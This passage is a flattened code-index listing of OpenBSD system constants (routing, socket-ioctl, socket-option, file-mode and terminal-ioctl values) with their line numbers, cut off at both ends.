0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80246987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x805c693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x805c6949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x805c6941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x805c693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x805c6942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x805c6948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc05c693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc03c6958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc028694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc05c6942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0186943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x805c6955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x805c693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x805c6954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x805c694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80246989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0147534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0147533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0086924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc024698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc024698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc024698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0246988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0386938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8024698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x400c745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK 